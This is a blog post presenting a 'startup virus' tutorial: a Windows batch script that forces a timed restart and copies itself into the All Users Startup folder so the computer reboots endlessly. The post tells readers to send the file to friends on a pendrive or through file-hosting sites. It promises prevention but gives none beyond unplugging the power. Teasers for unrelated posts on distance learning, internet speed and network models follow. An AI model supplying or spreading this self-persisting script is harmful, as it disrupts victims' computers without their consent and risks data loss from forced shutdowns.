Skip to main content

Batch File Proramming – 3 | Startup Virus

NETWORK TECH WORLD

Batch File Proramming – 3 | Startup Virus

How to create a Batch File

This tutorial is about batch file programming, How to code a bit harmful virus using batch file and How to prevent against this virus. Read this amazing post and don’t forget to leave your feedback in comments.


Batch file commands :

@echo off
shutdown -r -t 100 -c “maverick”
xcopy “filename.bat” “C:Documents and SettingsAll UsersStart MenuProgramsStartup” /y
____________________________________________________________
Save it as any name with a .bat extension but with name *filename.bat*
you can change “maverick” with what ever message you want, You can also change “100“(in secs) with whatever time you want to restart.
if you changes *filename.bat* to “othername.bat” then also changes the above code to
|| xcopy “othername.bat” “C:Documents and SettingsAll UsersStart MenuProgramsStartup” /y ||
Send this file to your friends using a pendrive or by uploadig it to rapidshare/hotfile service.

LOGIC:-

.bat- Files having these extensions are known as batch files containg commands to be executed by command interpreter.
@echo off –  This command is used to turn off the display of executing command in command console.
-r – This parameter restarts the PC.You can also use “-s” (without quotes) to shutdown the PC.
-t :- This parameter specifies time in seconds.
-c :- This parameter is used to specify a message in the shutdown box.
xcopy:- This command copies the file specified with double quotes “othername.bat” to the location specifies (in this case startup) with double quotes “C:Documents and SettingsAll UsersStart MenuProgramsStartup”
Startup:This folder contans files to be open when ever your computer boot ups.If you place a file here it will automatically open that file on every boot.
y :- This parameter asks the command prompt to overwrite the file
After running this virus, your PC will restart and again and so on..
only way to stop this mess is to directly plug off the switch from the power board.

Comments

Popular posts from this blog

Distance learning online course

NETWORK TECH WORLD If anybody wants to doing online distance learning courses are We all the courses. BA, MA, BCOM, MCOM, BCA, MCA, BSC IT, MSC IT, BED, MED, BSC, MSC, B LIB, M LIB, BTECH, MTECH, BBA, MBA, D PHARMA, B PHARMA, BHM, DHM, MHM, PhD, Bped, More etc or 10th and 12th University's are 1. IEC University Himachal Pradesh 2. Sunrise University Alwar Rajasthan 3. Himalayan Garhwal University Uttrakhand 4. Sangai International University Manipur 5. Calorx University Ahmedabad Gujarat 6. Himalayan University Arunachal Pradesh 7. Arni University Himachal Pradesh 8.Subharti University Inquiry call or what's app number is 7017329859 or comments below thank u.

How to increase your internet speed

NETWORK TECH WORLD  How to increase your internet speed Moderate Internet speed is the most ghastly and abominable condition for each Internet client. It influences the work of the clients and causes wastage of time. There are numerous purposes for the moderate Internet speed. Luckily, you can build the pace of your net association with a few enterprises. Top 5 ways to increase your internet speed Use antivirus program: A standout amongst the most normal purposes for the moderate  Internet speed  is infection, spy wares and ad ware. These infections influence the Internet settings and capacities that in turn cause moderate scanning speed. Thus, it is fitting that you institute exceptional quality against infection programming to get freed from the infection and their terrible impacts. Filter your workstation on a normal foundation with a hostile to infection to evacuate all the infections and ad ware. Use ad ware evacuation system and spy ware evac...

What is difference between osi model and tcp model

NETWORK TECH WORL What is difference between osi model and tcp model  The OSI model (Open Systems Interconnection model) and the TCP/IP model are both frameworks that describe how data is transmitted between computers over a network. The OSI model is a theoretical model that consists of seven layers, each of which performs a specific function in the process of transmitting data. The layers are: Physical layer: This layer deals with the physical transmission of data. It is concerned with things like cables, connectors, and the actual physical transmission of data over the network. Data link layer: This layer is responsible for ensuring that the data is transmitted accurately from one device to another over a physical link. It is concerned with things like error correction and flow control. Network layer: This layer is responsible for routing data between devices on a network. It determines the best path for data to take based on things like network congestion and the availability of...